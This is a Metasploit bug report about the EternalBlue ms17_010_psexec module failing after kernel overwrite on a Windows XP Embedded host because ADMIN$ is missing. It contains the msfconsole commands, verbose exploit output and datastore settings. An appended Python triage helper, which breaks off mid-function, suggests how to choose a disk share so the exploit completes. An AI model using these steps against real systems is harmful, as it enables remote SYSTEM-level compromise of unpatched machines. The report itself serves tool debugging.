metasploit-framework
windows/smb/ms17_010_psexec (EternalBlue) module fails on Vulnerable Windows XP embedded instance
Steps to reproduce
How'd you do it?
- start metasploit
- select the specific eternalblue module mentioned below against a specific target
- run the module and observe the error
Expected behavior
What should happen?
Eternalblue module should open a normal session
Current behavior
What happens instead?
Error on receiving SMB information from target
Metasploit version
msf6 exploit(windows/smb/ms17_010_psexec) > version
Framework: 6.4.20-dev
Console  : 6.4.20-dev
Additional Information
- Start msfconsole
- Run the command set loglevel 3
- Take the steps necessary to recreate your issue
- Run the debug command

msf6 exploit(windows/smb/ms17_010_psexec) > run
[*] Exploiting target 10.10.10.1
[*] Started reverse TCP handler on 10.128.32.72:4444
[*] 10.10.10.1:445 - Target OS: Windows 7 Professional 7601 Service Pack 1
[-] 10.10.10.1:445 - Unable to find accessible named pipe!
[*] Exploiting target 10.10.10.2
[*] Started reverse TCP handler on 10.128.32.72:4444
[*] 10.10.10.2:445 - Target OS: Windows 5.1
[*] 10.10.10.2:445 - Filling barrel with fish... done
[*] 10.10.10.2:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.2:445 - [*] Preparing dynamite...
[*] 10.10.10.2:445 - [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.2:445 - [+] Successfully Leaked Transaction!
[*] 10.10.10.2:445 - [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.2:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.2:445 - Reading from CONNECTION struct at: 0x85102a58
[*] 10.10.10.2:445 - Built a write-what-where primitive...
[+] 10.10.10.2:445 - Overwrite complete... SYSTEM session obtained!
[-] 10.10.10.2:445 - Rex::Proto::SMB::Exceptions::ErrorCode
[-] 10.10.10.2:445 - The server responded with error: STATUS_BAD_NETWORK_NAME (Command=117 WordCount=0)
[-] 10.10.10.2:445 - /usr/share/metasploit-framework/lib/rex/proto/smb/client.rb:256:in `smb_recv_parse'
/usr/share/metasploit-framework/lib/rex/proto/smb/client.rb:1126:in `tree_connect'
/usr/share/metasploit-framework/lib/rex/proto/smb/simple_client.rb:178:in `connect'
/usr/share/metasploit-framework/lib/msf/core/exploit/remote/smb/client/psexec.rb:207:in `powershell_installed?'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb:154:in `smb_pwn'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb:129:in `exploit'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:224:in `job_run_proc'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:177:in `run'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:144:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:172:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:45:in `exploit_single'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:166:in `block in cmd_exploit'
/usr/share/metasploit-framework/lib/msf/core/rhosts_walker.rb:68:in `block in each'
/usr/share/metasploit-framework/lib/msf/core/rhosts_walker.rb:163:in `<<'
/usr/share/metasploit-framework/lib/msf/core/rhosts_walker.rb:163:in `block (3 levels) in parse'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.57/lib/rex/socket/range_walker.rb:234:in `each_host'
/usr/share/metasploit-framework/lib/msf/core/rhosts_walker.rb:158:in `block (2 levels) in parse'
/usr/share/metasploit-framework/lib/msf/core/rhosts_walker.rb:120:in `each'
/usr/share/metasploit-framework/lib/msf/core/rhosts_walker.rb:120:in `block in parse'
/usr/share/metasploit-framework/lib/msf/core/rhosts_walker.rb:67:in `each'
/usr/share/metasploit-framework/lib/msf/core/rhosts_walker.rb:67:in `each'
/usr/share/metasploit-framework/lib/msf/core/rhosts_walker.rb:67:in `each'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:157:in `with_index'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:157:in `cmd_exploit'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:582:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:531:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:525:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:525:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:165:in `block in run'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:309:in `block in with_history_manager_context'
/usr/share/metasploit-framework/lib/rex/ui/text/shell/history_manager.rb:37:in `with_context'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:306:in `with_history_manager_context'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:133:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:54:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in
===8<=== CUT AND PASTE EVERYTHING BELOW THIS LINE ===8<===
Module/Datastore
The following global/module datastore, and database setup was configured before the issue occurred:
[framework/core]
loglevel=3
rhosts=10.10.10.1 10.10.10.2
[framework/ui/console]
ActiveModule=exploit/windows/smb/ms17_010_psexec
[windows/smb/ms17_010_psexec]
WORKSPACE=
VERBOSE=false
WfsDelay=10
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
RHOSTS=10.10.10.1 10.10.10.2
RPORT=445
SSL=false
SSLServerNameIndication=
SSLVersion=Auto
SSLVerifyMode=PEER
SSLCipher=
Proxies=
CPORT=
CHOST=
ConnectTimeout=10
TCP::max_send_size=0
TCP::send_delay=0
DCERPC::max_frag_size=4096
DCERPC::fake_bind_multi=true
DCERPC::fake_bind_multi_prepend=0
DCERPC::fake_bind_multi_append=0
DCERPC::smb_pipeio=rw
DCERPC::ReadTimeout=10
NTLM::UseNTLMv2=true
NTLM::UseNTLM2_session=true
NTLM::SendLM=true
NTLM::UseLMKey=false
NTLM::SendNTLM=true
NTLM::SendSPN=true
SMB::pipe_evasion=false
SMB::pipe_write_min_size=1
SMB::pipe_write_max_size=1024
SMB::pipe_read_min_size=1
SMB::pipe_read_max_size=1024
SMB::pad_data_level=0
SMB::pad_file_level=0
SMB::obscure_trans_pipe_level=0
SMBDirect=true
SMBUser=
SMBPass=
SMBDomain=.
SMBName=*SMBSERVER
SMB::VerifySignature=false
SMB::ChunkSize=500
SMB::Native_OS=Windows 2000 2195
SMB::Native_LM=Windows 2000 5.0
SMB::AlwaysEncrypt=true
KrbCacheMode=read-write
SMB::Auth=auto
SMB::Rhostname=
DomainControllerRhost=
SMB::Krb5Ccname=
SMB::KrbOfferedEncryptionTypes=AES256,AES128,RC4-HMAC,DES-CBC-MD5,DES3-CBC-SHA1
SERVICE_NAME=
SERVICE_DISPLAY_NAME=
SERVICE_DESCRIPTION=
SERVICE_PERSIST=false
CMD::DELAY=3
NAMED_PIPES=/usr/share/metasploit-framework/data/wordlists/named_pipes.txt
NAMEDPIPE=
LEAKATTEMPTS=99
DBGTRACE=false
CheckModule=auxiliary/scanner/smb/smb_ms17_010
Powershell::persist=false
Powershell::prepend_sleep=
Powershell::prepend_protections_bypass=auto
Powershell::strip_comments=true
Powershell::strip_whitespace=false
Powershell::sub_vars=true
Powershell::sub_funcs=false
Powershell::exec_in_place=false
Powershell::exec_rc4=false
Powershell::remove_comspec=false
Powershell::noninteractive=true
Powershell::encode_final_payload=false
Powershell::encode_inner_payload=false
Powershell::wrap_double_quotes=true
Powershell::no_equals=false
Powershell::method=reflection
EXE::EICAR=false
EXE::Custom=
EXE::Path=
EXE::Template=
EXE::Inject=false
EXE::OldMethod=false
EXE::FallBack=false
MSI::EICAR=false
MSI::Custom=
MSI::Path=
MSI::Template=
MSI::UAC=false
SHARE=ADMIN$
ALLOW_GUEST=false
SERVICE_FILENAME=
PSH_PATH=Windows\System32\WindowsPowerShell\v1.0\powershell.exe
SERVICE_STUB_ENCODER=
Database Configuration
The database contains the following information:
Session Type: postgresql selected, no connection
Framework Configuration
The features are configured as follows:
| name | enabled |
|---|---|
| wrapped_tables | true |
| fully_interactive_shells | false |
| manager_commands | false |
| datastore_fallbacks | true |
| metasploit_payload_warnings | true |
| defer_module_loads | false |
| smb_session_type | true |
| postgresql_session_type | true |
| mysql_session_type | true |
| mssql_session_type | true |
| ldap_session_type | false |
| show_successful_logins | false |
| dns | true |
| hierarchical_search_table | true |
History
The following commands were ran during the session and before this issue occurred:
7 set loglevel 3
8 setg rhosts 10.10.10.1 10.10.10.2
9 search eternalblue
10 use 10
11 run
12 debug
Framework Errors
The following framework errors occurred before the issue occurred:
[10/07/2024 11:20:16] [e(0)] core: Failed to connect to the database: No database YAML file
[10/07/2024 11:20:22] [e(0)] core: Failed to open history file: /home/user/.msf4/history with error: No such file or directory @ rb_sysopen - /home/user/.msf4/history
[10/07/2024 11:56:39] [e(0)] core: Failed to connect to the database: No database YAML file
Web Service Errors
The following web service errors occurred before the issue occurred:
msf-ws.log does not exist.
Framework Logs
The following framework logs were recorded before the issue occurred:
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_uuid with windows/smb/ms17_010_psexec]: reverse to bind
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_uuid with windows/smb/ms17_010_psexec]: bind to bind
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_uuid with windows/smb/ms17_010_psexec]: noconn to bind
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_uuid with windows/smb/ms17_010_psexec]: none to bind
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_uuid with windows/smb/ms17_010_psexec]: tunnel to bind
[10/07/2024 11:57:24] [d(1)] core: Module windows/x64/vncinject/bind_tcp_uuid is compatible with windows/smb/ms17_010_psexec
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/smb/ms17_010_psexec]: reverse to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/smb/ms17_010_psexec]: bind to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/smb/ms17_010_psexec]: noconn to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/smb/ms17_010_psexec]: none to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/smb/ms17_010_psexec]: tunnel to tunnel
[10/07/2024 11:57:24] [d(1)] core: Module windows/x64/vncinject/reverse_http is compatible with windows/smb/ms17_010_psexec
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/smb/ms17_010_psexec]: reverse to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/smb/ms17_010_psexec]: bind to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/smb/ms17_010_psexec]: noconn to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/smb/ms17_010_psexec]: none to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/smb/ms17_010_psexec]: tunnel to tunnel
[10/07/2024 11:57:24] [d(1)] core: Module windows/x64/vncinject/reverse_https is compatible with windows/smb/ms17_010_psexec
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/smb/ms17_010_psexec]: reverse to reverse
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/smb/ms17_010_psexec]: bind to reverse
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/smb/ms17_010_psexec]: noconn to reverse
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/smb/ms17_010_psexec]: none to reverse
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/smb/ms17_010_psexec]: tunnel to reverse
[10/07/2024 11:57:24] [d(1)] core: Module windows/x64/vncinject/reverse_tcp is compatible with windows/smb/ms17_010_psexec
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/smb/ms17_010_psexec]: reverse to reverse
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/smb/ms17_010_psexec]: bind to reverse
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/smb/ms17_010_psexec]: noconn to reverse
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/smb/ms17_010_psexec]: none to reverse
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/smb/ms17_010_psexec]: tunnel to reverse
[10/07/2024 11:57:24] [d(1)] core: Module windows/x64/vncinject/reverse_tcp_rc4 is compatible with windows/smb/ms17_010_psexec
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/smb/ms17_010_psexec]: reverse to reverse
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/smb/ms17_010_psexec]: bind to reverse
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/smb/ms17_010_psexec]: noconn to reverse
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/smb/ms17_010_psexec]: none to reverse
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/smb/ms17_010_psexec]: tunnel to reverse
[10/07/2024 11:57:24] [d(1)] core: Module windows/x64/vncinject/reverse_tcp_uuid is compatible with windows/smb/ms17_010_psexec
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/smb/ms17_010_psexec]: reverse to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/smb/ms17_010_psexec]: bind to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/smb/ms17_010_psexec]: noconn to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/smb/ms17_010_psexec]: none to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/smb/ms17_010_psexec]: tunnel to tunnel
[10/07/2024 11:57:24] [d(1)] core: Module windows/x64/vncinject/reverse_winhttp is compatible with windows/smb/ms17_010_psexec
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/smb/ms17_010_psexec]: reverse to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/smb/ms17_010_psexec]: bind to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/smb/ms17_010_psexec]: noconn to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/smb/ms17_010_psexec]: none to tunnel
[10/07/2024 11:57:24] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/smb/ms17_010_psexec]: tunnel to tunnel
[10/07/2024 11:57:24] [d(1)] core: Module windows/x64/vncinject/reverse_winhttps is compatible with windows/smb/ms17_010_psexec
[10/07/2024 11:57:24] [d(0)] core: SMB version(s) to negotiate: [1]
[10/07/2024 11:57:24] [d(0)] core: Negotiated SMB version: SMB1
Web Service Logs
The following web service logs were recorded before the issue occurred:
msf-ws.log does not exist.
Version/Install
The versions and install method of your Metasploit setup:
Framework: 6.4.20-dev
Ruby: ruby 3.1.2p20 (2022-04-12 revision 4491bb740a) [x86_64-linux-gnu]
OpenSSL: OpenSSL 3.3.1 4 Jun 2024
Install Root: /usr/share/metasploit-framework
Session Type: postgresql selected, no connection
Install Method: Standard kali install, upgraded
Additional File: NMAP Scan of the affected Host NMAPOutputRedacted.txt
[-] 10.10.10.2:445 - Rex::Proto::SMB::Exceptions::ErrorCode
[-] 10.10.10.2:445 - The server responded with error: STATUS_BAD_NETWORK_NAME (Command=117 WordCount=0)
It seems like the default share used by the exploit (ADMIN$) doesn't exist.
Here's some debugtrace output:
ADMIN$
msf6 exploit(windows/smb/ms17_010_psexec) > set dbgtrace true
dbgtrace => true
msf6 exploit(windows/smb/ms17_010_psexec) > setg rhosts 10.10.10.2
rhosts => 10.10.10.2
msf6 exploit(windows/smb/ms17_010_psexec) > check
[*] 10.10.10.2:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.2:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1
[*] 10.10.10.2:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.2:445 - The target is vulnerable.
msf6 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 10.10.10.72:4444
[*] 10.10.10.2:445 - Target OS: Windows 5.1
[*] 10.10.10.2:445 - Filling barrel with fish... done
[*] 10.10.10.2:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.2:445 - [*] Preparing dynamite...
[*] 10.10.10.2:445 - [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.2:445 - [+] Successfully Leaked Transaction!
[*] 10.10.10.2:445 - [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.2:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.2:445 - Reading from CONNECTION struct at: 0x84dba7f0
[*] 10.10.10.2:445 - CONNECTION: 0x84dba7f0
[*] 10.10.10.2:445 - SESSION: 0xe2c716d0
[*] 10.10.10.2:445 - FLINK: 0x5bd48
[*] 10.10.10.2:445 - InData: 0x5ae28
[*] 10.10.10.2:445 - MID: 0x15
[*] 10.10.10.2:445 - TRANS1: 0x58b50
[*] 10.10.10.2:445 - TRANS2: 0x5ac90
[*] 10.10.10.2:445 - Built a write-what-where primitive...
[*] 10.10.10.2:445 - Session Data: [hex dump omitted]
[*] 10.10.10.2:445 - session dat len = 256
[*] 10.10.10.2:445 - Session ctx offset = 84
[*] 10.10.10.2:445 - Session ctx data = 203d7de204110200021801000100000000010000000000000000000000000000000000001704061cf89020854850c4e250897ce25050c4e258897ce29017c7e29017c7e2000000000200010060f78d840000000006040600464c666cf09ac6e2b8b5c7e201006d000000000003040904464c666c08807ae200000000
[*] 10.10.10.2:445 - secCtxAddr: e27d3d20
[*] 10.10.10.2:445 - TOKEN data = [hex dump omitted]
[*] 10.10.10.2:445 - userAndGroupCount: 0x3
[*] 10.10.10.2:445 - userAndGroupsAddr: 0xe23acbc0
[*] 10.10.10.2:445 - RestrictedSids: 0x0
[*] 10.10.10.2:445 - RestrictedSidCount: 0x0
[+] 10.10.10.2:445 - Overwrite complete... SYSTEM session obtained!
[-] 10.10.10.2:445 - Rex::Proto::SMB::Exceptions::ErrorCode
[-] 10.10.10.2:445 - The server responded with error: STATUS_BAD_NETWORK_NAME (Command=117 WordCount=0)
[-] 10.10.10.2:445 - /usr/share/metasploit-framework/lib/rex/proto/smb/client.rb:256:in `smb_recv_parse'
/usr/share/metasploit-framework/lib/rex/proto/smb/client.rb:1126:in `tree_connect'
/usr/share/metasploit-framework/lib/rex/proto/smb/simple_client.rb:178:in `connect'
/usr/share/metasploit-framework/lib/msf/core/exploit/remote/smb/client/psexec.rb:207:in `powershell_installed?'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb:154:in `smb_pwn'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb:129:in `exploit'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:224:in `job_run_proc'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:177:in `run'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:144:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:172:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:45:in `exploit_single'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:188:in `cmd_exploit'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:582:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:531:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:525:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:525:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:165:in `block in run'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:309:in `block in with_history_manager_context'
/usr/share/metasploit-framework/lib/rex/ui/text/shell/history_manager.rb:37:in `with_context'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:306:in `with_history_manager_context'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:133:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:54:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in `<main>'
[*] Exploit completed, but no session was created.
IPC$
msf6 exploit(windows/smb/ms17_010_psexec) > setg SHARE IPC$
SHARE => IPC$
msf6 exploit(windows/smb/ms17_010_psexec) > set dbgtrace true
dbgtrace => true
msf6 exploit(windows/smb/ms17_010_psexec) > setg rhosts 10.10.10.2
rhosts => 10.10.10.2
msf6 exploit(windows/smb/ms17_010_psexec) > check
[*] 10.10.10.2:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.2:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1
[*] 10.10.10.2:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.2:445 - The target is vulnerable.
msf6 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 10.10.10.72:4444
[*] 10.10.10.2:445 - Target OS: Windows 5.1
[*] 10.10.10.2:445 - Filling barrel with fish... done
[*] 10.10.10.2:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.2:445 - [*] Preparing dynamite...
[*] 10.10.10.2:445 - [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.2:445 - [+] Successfully Leaked Transaction!
[*] 10.10.10.2:445 - [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.2:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.2:445 - Reading from CONNECTION struct at: 0x84dbe468
[*] 10.10.10.2:445 - CONNECTION: 0x84dbe468
[*] 10.10.10.2:445 - SESSION: 0xe26bd940
[*] 10.10.10.2:445 - FLINK: 0x5bd48
[*] 10.10.10.2:445 - InData: 0x5ae28
[*] 10.10.10.2:445 - MID: 0xa
[*] 10.10.10.2:445 - TRANS1: 0x58b50
[*] 10.10.10.2:445 - TRANS2: 0x5ac90
[*] 10.10.10.2:445 - Built a write-what-where primitive...
[*] 10.10.10.2:445 - Session Data: 0a02a80000000000608836850100000000000000180be4a9180be4a9e700000068e4db840000000000000000000000000000000000000000f0589c065f19db01a019aa065f19db01ffffffffffffff7fffffffffffffff7f0000000000000000a75b780000000000000000000000000000000000000000000000000000000000020000007004cee204110200011801000100000000010000000000000000000000000000000000001704061cf890208568da6be240d877e270da6be248d877e200da6be200da6be2000000000200010008a79d840000000006040300464c666cc83a77e238ca6ae201000000000000000304061cf890208590d976e2e03a77e2
[*] 10.10.10.2:445 - session dat len = 256
[*] 10.10.10.2:445 - Session ctx offset = 84
[*] 10.10.10.2:445 - Session ctx data = 7004cee204110200011801000100000000010000000000000000000000000000000000001704061cf890208568da6be240d877e270da6be248d877e200da6be200da6be2000000000200010008a79d840000000006040300464c666cc83a77e238ca6ae201000000000000000304061cf890208590d976e2e03a77e2
[*] 10.10.10.2:445 - secCtxAddr: e2ce0470
[*] 10.10.10.2:445 - TOKEN data = 4e744c6d537370200000000000000000ad5b780000000000a75b7800000000000000000000000000ffffffffffffff7f98feaa84210200000000000010000000af5b780000000000000000000300000000000000000000004c000000f40100000000000000000000d0c07ae20000000080f431e2d0c07ae280f431e2000000000200000002000000000000000000000000000000000000000000000000000000e8c07ae207000000f4c07ae20000000000c17ae20700000001010000000000050700000001010000000000000000000001010000000000050200000025020000260200000e0000001203000002000000240403002602000088e03e866014c9e2
[*] 10.10.10.2:445 - userAndGroupCount: 0x3
[*] 10.10.10.2:445 - userAndGroupsAddr: 0xe27ac0d0
[*] 10.10.10.2:445 - RestrictedSids: 0x0
[*] 10.10.10.2:445 - RestrictedSidCount: 0x0
[+] 10.10.10.2:445 - Overwrite complete... SYSTEM session obtained!
[-] 10.10.10.2:445 - Rex::Proto::SMB::Exceptions::ErrorCode
[-] 10.10.10.2:445 - The server responded with error: STATUS_OBJECT_PATH_SYNTAX_BAD (Command=45 WordCount=0)
[-] 10.10.10.2:445 - /usr/share/metasploit-framework/lib/rex/proto/smb/client.rb:256:in `smb_recv_parse'
/usr/share/metasploit-framework/lib/rex/proto/smb/client.rb:1270:in `open'
/usr/share/metasploit-framework/lib/rex/proto/smb/simple_client.rb:224:in `open'
/usr/share/metasploit-framework/lib/msf/core/exploit/remote/smb/client.rb:275:in `smb_file_exist?'
/usr/share/metasploit-framework/lib/msf/core/exploit/remote/smb/client/psexec.rb:209:in `powershell_installed?'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb:154:in `smb_pwn'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb:129:in `exploit'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:224:in `job_run_proc'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:177:in `run'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:144:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:172:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:45:in `exploit_single'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:188:in `cmd_exploit'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:582:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:531:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:525:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:525:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:165:in `block in run'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:309:in `block in with_history_manager_context'
/usr/share/metasploit-framework/lib/rex/ui/text/shell/history_manager.rb:37:in `with_context'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:306:in `with_history_manager_context'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:133:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:54:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in `<main>'
[*] Exploit completed, but no session was created.
Would it fail earlier if powershell is not installed/enabled on target?
But are the shares ADMIN$ and IPC$ existing/exposed on the target?
Yes, the IPC$ one is, ADMIN$ does not exist however.
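The two errors in this thread come from the same post-exploitation step failing at two different points. After the kernel overwrite, the module hands off to the psexec mixin, which first tree-connects to SHARE (STATUS_BAD_NETWORK_NAME on Command=117, SMB_COM_TREE_CONNECT_ANDX, because ADMIN$ does not exist on this target) and then opens a file on that share (STATUS_OBJECT_PATH_SYNTAX_BAD on Command=45, SMB_COM_OPEN_ANDX, because IPC$ only carries named pipes and cannot hold a file). The following is an added pre-flight and triage helper, not part of this thread and not metasploit-framework code: it decodes those error lines and picks a usable disk share from an `smbclient -L` listing. The function names, the sample listings and the preference order (ADMIN$, then C$, then any other disk share) are assumptions of this example.

```python
"""Pre-flight and triage helper for ms17_010_psexec share failures.

Added example; not code from the metasploit-framework project. Share listings
are assumed to be in `smbclient -L HOST` format; all sample data is constructed.
"""
import re

# SMB1 command codes (MS-CIFS 2.2.2.1), printed in decimal by Rex::Proto::SMB
# in the "(Command=N WordCount=M)" suffix of its error lines.
SMB_COM_OPEN_ANDX = 0x2D           # 45:  the file open behind smb_file_exist?
SMB_COM_TREE_CONNECT_ANDX = 0x75   # 117: the tree_connect to \\host\SHARE

ERROR_RE = re.compile(
    r"The server responded with error: (?P<status>STATUS_[A-Z0-9_]+) "
    r"\(Command=(?P<cmd>\d+) WordCount=\d+\)"
)


def triage_error(line):
    """Map one Rex SMB error line to a short diagnosis.

    Returns None when the line is not an SMB error. The two explicit cases are
    the ones this thread shows; anything else is reported generically.
    """
    m = ERROR_RE.search(line)
    if not m:
        return None
    status, cmd = m.group("status"), int(m.group("cmd"))
    if cmd == SMB_COM_TREE_CONNECT_ANDX and status == "STATUS_BAD_NETWORK_NAME":
        return ("share missing: tree_connect to SHARE was refused, enumerate "
                "shares and set SHARE to a disk share that exists")
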